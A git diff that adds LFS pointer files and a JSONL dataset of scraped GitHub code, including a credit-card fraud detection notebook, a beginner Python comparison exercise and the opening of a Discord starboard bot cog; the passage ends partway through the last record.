diff --git a/.gitattributes b/.gitattributes index 709d00e2b763c3f256f453020c70ece7d852a0a9..e98a579988ac632e73baee8cb3b19ce6f9325c3f 100644 --- a/.gitattributes +++ b/.gitattributes @@ -4169,3 +4169,52 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text 2792.jsonl filter=lfs diff=lfs merge=lfs -text 2793.jsonl filter=lfs diff=lfs merge=lfs -text 2788.jsonl filter=lfs diff=lfs merge=lfs -text +1448.jsonl filter=lfs diff=lfs merge=lfs -text +283.jsonl filter=lfs diff=lfs merge=lfs -text +2828.jsonl filter=lfs diff=lfs merge=lfs -text +2825.jsonl filter=lfs diff=lfs merge=lfs -text +2823.jsonl filter=lfs diff=lfs merge=lfs -text +2834.jsonl filter=lfs diff=lfs merge=lfs -text +2835.jsonl filter=lfs diff=lfs merge=lfs -text +2830.jsonl filter=lfs diff=lfs merge=lfs -text +2832.jsonl filter=lfs diff=lfs merge=lfs -text +2836.jsonl filter=lfs diff=lfs merge=lfs -text +2839.jsonl filter=lfs diff=lfs merge=lfs -text +2837.jsonl filter=lfs diff=lfs merge=lfs -text +2843.jsonl filter=lfs diff=lfs merge=lfs -text +2840.jsonl filter=lfs diff=lfs merge=lfs -text +2844.jsonl filter=lfs diff=lfs merge=lfs -text +2845.jsonl filter=lfs diff=lfs merge=lfs -text +894.jsonl filter=lfs diff=lfs merge=lfs -text +981.jsonl filter=lfs diff=lfs merge=lfs -text +977.jsonl filter=lfs diff=lfs merge=lfs -text +979.jsonl filter=lfs diff=lfs merge=lfs -text +982.jsonl filter=lfs diff=lfs merge=lfs -text +985.jsonl filter=lfs diff=lfs merge=lfs -text +978.jsonl filter=lfs diff=lfs merge=lfs -text +983.jsonl filter=lfs diff=lfs merge=lfs -text +969.jsonl filter=lfs diff=lfs merge=lfs -text +999.jsonl filter=lfs diff=lfs merge=lfs -text +988.jsonl filter=lfs diff=lfs merge=lfs -text +995.jsonl filter=lfs diff=lfs merge=lfs -text +993.jsonl filter=lfs diff=lfs merge=lfs -text +994.jsonl filter=lfs diff=lfs merge=lfs -text +989.jsonl filter=lfs diff=lfs merge=lfs -text +998.jsonl filter=lfs diff=lfs merge=lfs -text +996.jsonl filter=lfs diff=lfs merge=lfs -text +5522.jsonl filter=lfs diff=lfs merge=lfs -text +553.jsonl filter=lfs diff=lfs merge=lfs -text +5524.jsonl filter=lfs diff=lfs merge=lfs -text +3450.jsonl filter=lfs diff=lfs merge=lfs -text +3453.jsonl filter=lfs diff=lfs merge=lfs -text +3456.jsonl filter=lfs diff=lfs merge=lfs -text +3458.jsonl filter=lfs diff=lfs merge=lfs -text +3457.jsonl filter=lfs diff=lfs merge=lfs -text +3461.jsonl filter=lfs diff=lfs merge=lfs -text +3460.jsonl filter=lfs diff=lfs merge=lfs -text +345.jsonl filter=lfs diff=lfs merge=lfs -text +3422.jsonl filter=lfs diff=lfs merge=lfs -text +3469.jsonl filter=lfs diff=lfs merge=lfs -text +3451.jsonl filter=lfs diff=lfs merge=lfs -text +3471.jsonl filter=lfs diff=lfs merge=lfs -text +3413.jsonl filter=lfs diff=lfs merge=lfs -text diff --git a/1448.jsonl b/1448.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d170145ffe111e4b6745429f77bfecc8f9db7285 --- /dev/null +++ b/1448.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:70f643df0e42d20fba4c6aba26312fa796e3abf9f43a33cb2338973ff41cd2ac +size 69424991 diff --git a/2823.jsonl b/2823.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a23192f119ace2b6b7146771f88118a2809935a0 --- /dev/null +++ b/2823.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c745074c2c62e6ce7c0b42e65f57d671931b823713d76aa72628227fd65c8ecf +size 63955947 diff --git a/2825.jsonl b/2825.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..162104c941016e0100591e76a7f93140bbd8f8cc --- /dev/null 
+++ b/2825.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51c2cb08ec47b0db045a5e69b5fdc053f85b6dad925b030e3c2e6a73455c8c66 +size 55846256 diff --git a/2828.jsonl b/2828.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2cc501db8a2a240980db2238a3ed02c53a871755 --- /dev/null +++ b/2828.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:89b89e37395c1f62a81f91ccb2f9cbe04b37044e946da2d00a246de951cca0c7 +size 24942368 diff --git a/283.jsonl b/283.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0cb0bb8c386937699472052f4ad3f83d60ddb08 --- /dev/null +++ b/283.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:896e24ed327501ceb721dee6a905d8f15ba939f16f83192fa3797479517a4f92 +size 55698811 diff --git a/2830.jsonl b/2830.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..87c7ec9de7e356181ca5b2cdf187c148d34b739a --- /dev/null +++ b/2830.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14972ec8ae8ad1cf3bc3fc6194925c3aa0952efa3c3cc410456c126775e0a2f5 +size 58298205 diff --git a/2832.jsonl b/2832.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e6fcac46cdeb3e4204d37a0e78cd2466ad348e47 --- /dev/null +++ b/2832.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f12e9dca0d5848ca74de425e531915425fdf26ac7e87f6222a737a08a368afe +size 57976026 diff --git a/2834.jsonl b/2834.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63c719f241070a52edf09847938cbc4019a11124 --- /dev/null +++ b/2834.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af977658b53d036d474c5b04607d2b6cf4bd0d960a6874c816497be83ad4b5cb +size 54787304 diff --git a/2835.jsonl b/2835.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aef296e323359380570819df812f2dd3ef9f54af --- /dev/null +++ b/2835.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93584fcad1dc143f5f0df8fd193e588267938d762b737873780d8b5398d8e37e +size 58529437 diff --git a/2836.jsonl b/2836.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..06880eca98c89cd07b97a086ef8cb17da14adb91 --- /dev/null +++ b/2836.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0611c7c589871f0853a96a4c0ccfbda934bb51780ceb6dbe09f29f16d3a93e6d +size 62590607 diff --git a/2837.jsonl b/2837.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2e3455b9a7326d8fcd6b146519ee2b3b5e528a7 --- /dev/null +++ b/2837.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95cc5217b8c01b3868fa445af0fc2a10beef47972238430907f8901049a099e2 +size 67116673 diff --git a/2839.jsonl b/2839.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b9b7604b84f50fc7db66f59145de7906adfce6d --- /dev/null +++ b/2839.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:65862bf7cee61e270ed9cf86c51794b3c75c3133f253b11ddfd0689a1c622528 +size 59250756 diff --git a/2840.jsonl b/2840.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fc4bde617be02994476fe98a213635fdd900207b --- /dev/null +++ b/2840.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b9d14c8822a33c6dfe15934d483d5d4e98fb8cc380c27ea715ffa1248fa8158 +size 61275386 diff --git a/2843.jsonl b/2843.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..087171f64e5d5491948c5e073a9c62b36aef66b7 --- /dev/null +++ b/2843.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8dedc488c883e4e669024a2e74620d1b01a53ea9e6f13f81ff018359e3613be3 +size 56622942 diff --git a/2844.jsonl b/2844.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..725af5cee6e7bcb900778e51ccec4f999897a37e --- /dev/null +++ b/2844.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bd1ff8c31963a3ca029ccdba1b07f45d3b77be780bd206bf4487e52dc89dab89 +size 65555868 diff --git a/2845.jsonl b/2845.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..329b43b7cd88115ffb483598c9c11884d8e34d74 --- /dev/null +++ b/2845.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:801f2110c95ba97d069b8247a4050fc9571f62a69e01e873a3f8979cb9c537c1 +size 49102166 diff --git a/3413.jsonl b/3413.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ee9cac8a4a75190e3a6567c2cbd8f0569716e994 --- /dev/null +++ b/3413.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2cd40771ffdf6454d4d3679471ff79bcc9cf3d01bbee4cdbb599feed6f2af79b +size 18341634 diff --git a/3422.jsonl b/3422.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..22411fa91cbddacaaad522e04eb3803da3a56fe4 --- /dev/null +++ b/3422.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cddf09ad114ca44916165d104869504ccd2b1a1b0f5f6d3fa674b1b0753dcb33 +size 18657313 diff --git a/345.jsonl b/345.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..816ecd2a9afd167be8335c67fcefdc135b6311b4 --- /dev/null +++ b/345.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2587943337fb57435c4961b56320606aa5811e0922769880047adeca4cb118a +size 54990810 diff --git a/3450.jsonl b/3450.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..521c70253c08f6644752823d71c7f0bd3b0cd0bd --- /dev/null +++ b/3450.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:07b680597b25a953ac9cf443af14b6a67e386efac1c8a67597c9677ab7ab6919 +size 56493779 diff --git a/3451.jsonl b/3451.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..20e56ceb0381c3c1a59f3864724812799c7da630 --- /dev/null +++ b/3451.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:de23dcbb7b306d2e59d04fa81842ffbc7289a94f1694d9d662d308eddb618112 +size 66138728 diff --git a/3453.jsonl b/3453.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6c7e45f2d6d791728a8ee93f74c1a10450b9a1b6 --- /dev/null +++ b/3453.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a67c77f70ef18122418dee0a65cfa05518caf0ae68285f6b57b269f6242cd53a +size 14868381 diff --git a/3456.jsonl b/3456.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b38e575734704062b6f15e2dc626fe1368b0c3ea --- /dev/null +++ b/3456.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9d417750f8fc5fbd5b23f95ff13b80444803bba79d6018ceb65809e06b76ad0 +size 59074043 diff --git a/3457.jsonl b/3457.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5eb406aadb1dcf85b7346c9015ae9597daa4c9e6 --- /dev/null +++ b/3457.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e18a32e158650c9595f7c119d571e7c5a680d7a2ae9e6040724577147148d9df +size 
63845062 diff --git a/3458.jsonl b/3458.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fb247dd490b9b4392734c3b001a63093f850e72e --- /dev/null +++ b/3458.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b264cf00450649f4847d093377b65d8a4b8fbd00a2bbb50a5ef7e4d956551a75 +size 49173108 diff --git a/3460.jsonl b/3460.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..28035322afa0ea41c5c3a58be64a735fa4ede348 --- /dev/null +++ b/3460.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b1413255bbb409249ab8d8e091d3f97ffd3234c59745d8b5af17f7f7ed013a44 +size 56490914 diff --git a/3461.jsonl b/3461.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dd231ef3f8f5a30e6cba16964aac9a994f27c943 --- /dev/null +++ b/3461.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b9ae9c0b4be66fd0d033522f6ed0f7f7016ac82c793f468b6f5bbd3505a4e36 +size 55006844 diff --git a/3469.jsonl b/3469.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e478eb2c0022b6b3cc3b55b2853cf30f0a43eaf9 --- /dev/null +++ b/3469.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c063355f8883e30c78daabb290b0ef1c64cc5397a2d87231c2767f8228b87c7 +size 57907863 diff --git a/3471.jsonl b/3471.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a394d443abab40f4999a6e18d4e9436abb99359f --- /dev/null +++ b/3471.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ecaa5674f507fa136853661be0002c16f278cd1bf2aa11a025e9f91bec88346a +size 61754463 diff --git a/4024.jsonl b/4024.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d9fd1533b5f6f5b5779b37d22fd3433240c6b48a --- /dev/null +++ b/4024.jsonl @@ -0,0 +1,384 @@ +{"seq_id":"10044023117","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[31]:\n\n\nimport pandas as pd #To hand with data \nimport numpy as np #To math \nimport seaborn as sns #to visualization\nimport matplotlib.pyplot as plt # to plot the graphs\nimport matplotlib.gridspec as gridspec # to do the grid of plots\nfrom sklearn import preprocessing\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\nimport time\n\n\n# In[40]:\n\n\ndf_credit = pd.read_csv(\"creditcard.csv\")\n#looking the how data looks\ndf_credit.head()\n\n\n# In[53]:\n\n\n#Looking the V's features\ncolumns = df_credit.iloc[:,1:29].columns\n\nfrauds = df_credit.Class == 1\nnormals = df_credit.Class == 0\n\ngrid = gridspec.GridSpec(14, 2)\nplt.figure(figsize=(15,20*4))\n\nfor n, col in enumerate(df_credit[columns]):\n ax = plt.subplot(grid[n])\n sns.distplot(df_credit[col][frauds], bins = 50, color='g') #Will receive the \"semi-salmon\" violin\n sns.distplot(df_credit[col][normals], bins = 50, color='r') #Will receive the \"ocean\" color\n ax.set_ylabel('Density')\n ax.set_title(str(col))\n ax.set_xlabel('')\nplt.savefig(\"variablehist.png\")\nplt.show()\n\n\n# In[54]:\n\n\ncolormap = plt.cm.Greens\n\nplt.figure(figsize=(20,16))\n\nsns.heatmap(round(df_credit.corr(),2),linewidths=0.1,vmax=1.0, \n square=True, cmap = colormap, linecolor='white', annot=True)\nplt.savefig(\"correlationplot.png\")\nplt.show()\n\n\n# In[35]:\n\n\nfrom imblearn.over_sampling import SMOTE\nfrom sklearn.model_selection import train_test_split\nfrom collections import Counter\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom 
sklearn.metrics import precision_score, recall_score, fbeta_score, confusion_matrix, precision_recall_curve, accuracy_score\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import KFold, cross_val_score\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.ensemble import GradientBoostingClassifier\n\n\n# In[41]:\n\n\ndf_credit = df_credit.sample(frac=0.2,replace=True, random_state=1212)\nX = df_credit.drop([\"Class\"], axis=1).values #Setting the X to do the split\ny = df_credit[\"Class\"].values # transforming the values in array\n# the function that we will use to better evaluate the model\ndef print_results(headline, true_value, pred):\n print(headline)\n print(\"accuracy: {}\".format(accuracy_score(true_value, pred)))\n print(\"precision: {}\".format(precision_score(true_value, pred)))\n print(\"recall: {}\".format(recall_score(true_value, pred)))\n print(\"f: {}\".format(fbeta_score(true_value, pred, beta=0.5)))\n#Showing the diference before and after the transformation used\nprint(\"normal data distribution: {}\".format(Counter(y)))\nX_smote, y_smote = SMOTE().fit_sample(X, y)\nprint(\"SMOTE data distribution: {}\".format(Counter(y_smote)))\n# splitting data into training and test set\nX_train, X_test_o, y_train, y_test_o = train_test_split(X_smote, y_smote, random_state=2, test_size=0.20)\nX_train_o, X_test, y_train_o, y_test = train_test_split(X_smote, y_smote, random_state=2, test_size=0.20)\n\n\n# In[42]:\n\n\n#RF\n#params of the model\nstart = time.clock()\nparam_grid = {\"max_depth\": [3,5,7],\n \"n_estimators\":[3,5,10],\n \"max_features\": [5,6,7,8]}\n# Creating the classifier\nclassifier = RandomForestClassifier(max_features=3, max_depth=2 ,n_estimators=10, \n random_state=3, criterion='entropy', n_jobs=-1, verbose=1 )\ngrid_search = GridSearchCV(classifier, param_grid=param_grid, cv=5, scoring='accuracy')\ngrid_search.fit(X_train, y_train)\nprint(grid_search.best_score_)\nprint(grid_search.best_params_)\nend = time.clock()\nprint('运行时间:',end - start)\n\n\n# In[43]:\n\n\nrf = RandomForestClassifier(max_features=grid_search.best_params_['max_features'], \n max_depth=grid_search.best_params_['max_depth'] ,\n n_estimators=grid_search.best_params_['n_estimators'],\n random_state=43, \n criterion='entropy', n_jobs=-1, verbose=1)\nrf.fit(X_train, y_train)\nrf_pre = rf.predict(X_test)\nprint(\"Confusion Matrix: \")\nprint(confusion_matrix(y_test, rf_pre))\nprint_results(\"\\nSMOTE + RandomForest classification\", y_test, rf_pre)\n\n\n# In[44]:\n\n\n#Bagging KNN\nstart = time.clock()\nknn = KNeighborsClassifier()\nk_range = list(range(1,10))\nweight_options = ['uniform','distance']\nalgorithm_options = ['auto']\nparam_gridknn = dict(n_neighbors = k_range,weights = weight_options,algorithm=algorithm_options)\n#grid search\ngrid_search = GridSearchCV(knn,param_gridknn,cv=5,scoring='accuracy',verbose=1,n_jobs=-1)\ngrid_search.fit(X_train, y_train)\nprint(grid_search.best_score_)\nprint(grid_search.best_params_)\nend = time.clock()\nprint('运行时间:',end - start)\n\n\n# In[45]:\n\n\nknn = BaggingClassifier(KNeighborsClassifier(n_neighbors=grid_search.best_params_['n_neighbors'],\n weights=grid_search.best_params_['weights'],\n algorithm=grid_search.best_params_['algorithm']),\n max_samples=0.5, max_features=0.5)\nknn.fit(X_train, y_train)\nknn_pre = knn.predict(X_test)\nprint(\"Confusion Matrix: \")\nprint(confusion_matrix(y_test, 
knn_pre))\nprint_results(\"\\nSMOTE + Bagging KNNclassification\", y_test, knn_pre)\n\n\n# In[46]:\n\n\n#logit\nstart = time.clock()\nparam_grid = {'C': [0.01, 0.1, 1, 10],\n 'penalty':['l1', 'l2']}\n\nlogreg = LogisticRegression(random_state=2)\n\ngrid_search_lr = GridSearchCV(logreg, param_grid=param_grid, scoring='recall', cv=5,n_jobs=-1)\n\ngrid_search_lr.fit(X_train, y_train)\n# The best recall obtained\nprint(grid_search_lr.best_score_)\n#Best parameter on trainning set\nprint(grid_search_lr.best_params_)\nend = time.clock()\nprint('运行时间:',end - start)\n\n\n# In[49]:\n\n\n# Creating the model\nlr = LogisticRegression(C=grid_search_lr.best_params_['C'], penalty=grid_search_lr.best_params_['penalty'])\nlr.fit(X_train, y_train)\nlogit_pre = lr.predict(X_test)\nprint(\"Confusion Matrix: \")\nprint(confusion_matrix(y_test, logit_pre))\nprint_results(\"\\nSMOTE + LogisticRegression\", y_test, logit_pre)\n\n\n# In[50]:\n\n\n#GBDT\nstart = time.clock()\nparameters = {'loss': ['deviance', 'exponential'], \n 'learning_rate': [0.05,0.1,0.2],\n 'n_estimators':[100],\n 'max_depth':[3,5,7,10]}\nclassifier=GradientBoostingClassifier()\ngrid_search = GridSearchCV(estimator = classifier,\n param_grid = parameters,\n scoring = 'accuracy',\n cv = 5,\n n_jobs = -1)\ngrid_search = grid_search.fit(X_train, y_train)\nbest_accuracy = grid_search.best_score_\nprint(\"The best accuracy using gridSearch is\", best_accuracy)\n\nbest_parameters = grid_search.best_params_\nprint(\"The best parameters for using this model is\", best_parameters)\nend = time.clock()\nprint('运行时间:',end - start)\n\n\n# In[51]:\n\n\n# Creating the model \ngbdt = GradientBoostingClassifier(loss=grid_search.best_params_['loss'],\n learning_rate=grid_search.best_params_['learning_rate'],\n n_estimators=grid_search.best_params_['n_estimators'],\n max_depth=grid_search.best_params_['max_depth'])\ngbdt.fit(X_train, y_train)\ngbdt_pre = gbdt.predict(X_test)\nprint(\"Confusion Matrix: \")\nprint(confusion_matrix(y_test, gbdt_pre))\nprint_results(\"\\nSMOTE + GBDT\", y_test, gbdt_pre)\n\n\n# In[87]:\n\n\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import roc_auc_score\n#ROC\nrf_fpr, rf_tpr, rf_thresold = roc_curve(y_test, rf_pre)\nknn_fpr, knn_tpr, knn_threshold = roc_curve(y_test, knn_pre)\nlogit_fpr, logit_tpr, logit_threshold = roc_curve(y_test, logit_pre)\ngbdt_fpr, gbdt_tpr, gbdt_threshold = roc_curve(y_test, gbdt_pre)\n\n\ndef graph_roc_curve_multiple(rf_fpr, rf_tpr, knn_fpr, knn_tpr, logit_fpr, logit_tpr, gbdt_fpr, gbdt_tpr):\n plt.figure(figsize=(16,8))\n plt.title('ROC Curve \\n 4 Classifiers', fontsize=18)\n plt.plot(rf_fpr, rf_tpr, label='Random Forest AUC: {:.4f}'.format(roc_auc_score(y_test, rf_pre)))\n plt.plot(knn_fpr, knn_tpr, label='Bagging kNN AUC: {:.4f}'.format(roc_auc_score(y_test, knn_pre)))\n plt.plot(logit_fpr, logit_tpr, label='Logistic Regression AUC: {:.4f}'.format(roc_auc_score(y_test, logit_pre)))\n plt.plot(gbdt_fpr, gbdt_tpr, label='GBDT AUC: {:.4f}'.format(roc_auc_score(y_test, gbdt_pre)))\n plt.plot([0, 1], [0, 1], 'k--')\n plt.axis([-0.01, 1, 0, 1])\n plt.xlabel('False Positive Rate', fontsize=16)\n plt.ylabel('True Positive Rate', fontsize=16)\n plt.annotate('Minimum ROC Score of 50% \\n (This is the minimum score to get)', xy=(0.5, 0.5), xytext=(0.6, 0.3),\n arrowprops=dict(facecolor='#6E726D', shrink=0.05),\n )\n plt.legend()\n \ngraph_roc_curve_multiple(rf_fpr, rf_tpr, knn_fpr, knn_tpr, logit_fpr, logit_tpr, gbdt_fpr, gbdt_tpr)\nplt.savefig(\"ROC.png\",dpi=400)\nplt.show()\n\n\n# 
In[85]:\n\n\nX_train = pd.DataFrame(X_train)\nfeatures = X_train.columns\nimportances = rf.feature_importances_\nindices = np.argsort(importances)\nplt.figure(figsize = (10,6))\nplt.title('Feature Importances(Random Forest)')\nplt.barh(range(len(indices)), importances[indices], color='coral', align='center')\nplt.yticks(range(len(indices)), [features[i] for i in indices])\nplt.xlabel('Relative Importance')\nplt.savefig(\"RFimp.png\",dpi=400)\nplt.show()\n\n\n# In[84]:\n\n\nX_train = pd.DataFrame(X_train)\nfeatures = X_train.columns\nimportances = gbdt.feature_importances_\nindices = np.argsort(importances)\nplt.figure(figsize = (10,6))\nplt.title('Feature Importances(GBDT)')\nplt.barh(range(len(indices)), importances[indices], color='g', align='center')\nplt.yticks(range(len(indices)), [features[i] for i in indices])\nplt.xlabel('Relative Importance')\nplt.savefig(\"GBDTimp.png\",dpi=400)\nplt.show()\n\n\n# In[83]:\n\n\nlog_reg_cf = confusion_matrix(y_test, logit_pre)\nkneighbors_cf = confusion_matrix(y_test, knn_pre)\nrf_cf = confusion_matrix(y_test, rf_pre)\ngbdt_cf = confusion_matrix(y_test, gbdt_pre)\n\nfig, ax = plt.subplots(2, 2,figsize=(22,12))\n\n\nsns.heatmap(log_reg_cf, ax=ax[0][0], annot=True, cmap=plt.cm.copper)\nax[0, 0].set_title(\"Logistic Regression \\n Confusion Matrix\", fontsize=14)\nax[0, 0].set_xticklabels(['', ''], fontsize=14, rotation=90)\nax[0, 0].set_yticklabels(['', ''], fontsize=14, rotation=360)\n\nsns.heatmap(kneighbors_cf, ax=ax[0][1], annot=True, cmap=plt.cm.copper)\nax[0][1].set_title(\"KNearsNeighbors \\n Confusion Matrix\", fontsize=14)\nax[0][1].set_xticklabels(['', ''], fontsize=14, rotation=90)\nax[0][1].set_yticklabels(['', ''], fontsize=14, rotation=360)\n\nsns.heatmap(rf_cf, ax=ax[1][0], annot=True, cmap=plt.cm.copper)\nax[1][0].set_title(\"Random Forest \\n Confusion Matrix\", fontsize=14)\nax[1][0].set_xticklabels(['', ''], fontsize=14, rotation=90)\nax[1][0].set_yticklabels(['', ''], fontsize=14, rotation=360)\n\nsns.heatmap(gbdt_cf, ax=ax[1][1], annot=True, cmap=plt.cm.copper)\nax[1][1].set_title(\"GBDT \\n Confusion Matrix\", fontsize=14)\nax[1][1].set_xticklabels(['', ''], fontsize=14, rotation=90)\nax[1][1].set_yticklabels(['', ''], fontsize=14, rotation=360)\n\nplt.savefig(\"cm.png\",dpi=400)\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"littlechuaner/Credit-Fraud-Detection","sub_path":"CreditFraudDetector.py","file_name":"CreditFraudDetector.py","file_ext":"py","file_size_in_byte":11317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14043321506","text":"#We would be using our knowledge abount booleans and comparison to compare the data of two students from a collection of grade submissions.\n\n#We'll kick it off by saving the id, average grade, and recent test score in variables for each of the two student entries.\n\n#Let's start saving the data for the first student entry! Create the variable ID_1 that stores \"#4\"\n\nid_1 = \"#4\"\n\n#Next, let's save the student's average grade by creating the variable AVERAGE_GRADE_1 with the value \"A\".\n\naverage_grade_1 = \"A\"\n\n#Finally, save the student's test with the variable TEST_SCORE_1 and set it to 90.\n\ntest_score_1 = 90\n\n#Let's move onto the next student entry! 
Like before, create id_2 that stores the value \"#5\".\n\nid_2 = \"#5\"\n\n#Create the variable AVERAGE_GRADE_2 and store the second student's average grade, \"A\".\n\naverage_grade_2 = \"A\"\n\n#Finally, create TEST_SCORE_2, and store the second stident's test score, 70.\n\ntest_score_2 = 70\n\n##Now that we've saved the data for each student entry, we're ready to compare them.\n\n# Next, we'll check for duplicate IDs, compare their average grade, and finally compare their test scores.\n\n#Create a no_duplicates variable that stores the result of the inequality comparison != between ID_! and ID_2.\n\nno_duplicates = id_1 != id_2\n\n#Start displaying the result of the comparison by using print with \"No duplicate entries:\"\n\nprint(\"no_duplicates entries:\")\n\n#Finally, display the value of the no_dupliocates variable.\n\nprint(no_duplicates)\n\n#Next, create the variable same_average and store the result of comparing average_grade_1 and average_grade_2 with ==.\n\nsame_average = average_grade_1 == average_grade_2\n\n#Display the string \"Same average grade:\" and on the next line display the variable same_average.\nprint(\"Same average grade:\")\n\nprint(same_average)\n\n#Next, instead a new variable called higher_score, use > to check if test_score_1 is greater than test_score_2.\n\nhigher_score = test_score_1 > test_score_2\n\n#To finish up, check the result by displaying \"id_1 has a higher score:\" then on the next line, display the variable higher_score.\n\nprint(\"id_1 has a higher score:\")\n\nprint (higher_score)\n\n","repo_name":"AyebakuroOruwori/Python-Kids-Projects","sub_path":"Comparing Dataset Entries-Storing Data in Variables.py","file_name":"Comparing Dataset Entries-Storing Data in Variables.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"32135699293","text":"import discord\nfrom discord import app_commands\nfrom discord.ext import commands\nimport pymongo\nimport datetime\n\nfrom utils import create_embed, initialize_mongodb\n\nclass Starboard(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.mongo_db = initialize_mongodb()\n\n @commands.Cog.listener()\n async def on_raw_reaction_add(self, payload):\n if not payload.guild_id:\n return\n\n starboard_data = self.mongo_db.starboard.find_one({\"guild_id\": str(payload.guild_id)})\n if not starboard_data:\n return\n\n if str(payload.emoji) != starboard_data[\"emoji\"]:\n return\n\n channel = self.bot.get_channel(payload.channel_id)\n message = await channel.fetch_message(payload.message_id)\n starboard_channel = self.bot.get_channel(int(starboard_data[\"channel_id\"]))\n\n for reaction in message.reactions:\n if str(reaction.emoji) == starboard_data[\"emoji\"] and reaction.count >= starboard_data[\"count\"]:\n starboard_msg_id = starboard_data.get(\"messages\", {}).get(str(message.id))\n embed = discord.Embed(description=message.content, color=discord.Color.gold())\n embed.set_author(name=message.author.name, icon_url=message.author.avatar.url)\n embed.add_field(name=\"Original Message\",\n value=f\"[Jump!](https://discord.com/channels/{message.guild.id}/{message.channel.id}/{message.id})\")\n\n if starboard_msg_id:\n starboard_msg = await starboard_channel.fetch_message(starboard_msg_id)\n if not starboard_msg:\n del starboard_data[\"messages\"][str(message.id)]\n self.mongo_db.starboard.update_one({\"guild_id\": str(payload.guild_id)},\n {\"$set\": starboard_data})\n return\n await 
